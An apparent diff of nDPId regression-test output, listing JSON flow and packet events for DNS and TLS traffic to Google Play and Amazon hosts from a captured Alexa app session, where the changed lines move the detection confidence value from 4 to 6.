+01053{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} +02117{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1490976195921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1490976195921,"pkt":"AMDKkaPvePiC0\/vCCABFAABNWmZAAEARM0CsECrYrBAqARIEADUAOVP\/iiYBAAABAAAAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAQ=="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1490976195980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1490976195980,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC37AVAAEARoTasECoBrBAq2AA1EgQAo8CaiiaBgAABAAUAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAMAHg1kazlwczdnb3FvZWVmCmNsb3VkZnJvbnQDbmV0AMA9AAEAAQAAADsABDRUPnPAPQABAAEAAAA7AAQ0VD7rwD0AAQABAAAAOwAENFQ+v8A9AAEAAQAAADsABDRUPj4="} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976195980,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.62.115"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976195980,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.62.115"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195983,"flow_last_seen":1490976195983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195983,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1490976195983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195983,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8wa5AAEAGL16sECrYNFQ+c6O4AbsdU0twAAAAAKAC\/\/9kRAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195984,"flow_last_seen":1490976195984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195984,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -892,186 +892,186 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1490976196001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196001,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7jUvy2sHVNLcaAScSD3DwAAAgQFtAQCCAps+oycAPaK3gEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1490976196002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196002,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0CnRAAEAG5qCsECrYNFQ+c6O5Abv6a4CuA2RlJoAQAVcj2AAAAQEICgD2iuBs+oX0"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1490976196003,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196003,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0wa9AAEAGL2WsECrYNFQ+c6O4AbsdU0tx1L8trYAQAVeVpAAAAQEICgD2iuBs+oyc"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1490976196008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196008,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7r33SsOWDm7RKAScSApGwAAAgQFtAQCCAps+o9VAPaK3gEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1490976196009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MZ5AAEAGv3asECrYNFQ+c6O6AbtYObtE990rD4AQAVfHrwAAAQEICgD2iuBs+o9V"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196016,"flow_last_seen":1490976196016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196016,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1490976196016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196016,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8LWlAAEAG4smsECrYNu8csuLAAbtkEKeIAAAAAKAC\/\/+hiQAAAgQFtAQCCAoA9orhAAAAAAEDAwg="} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 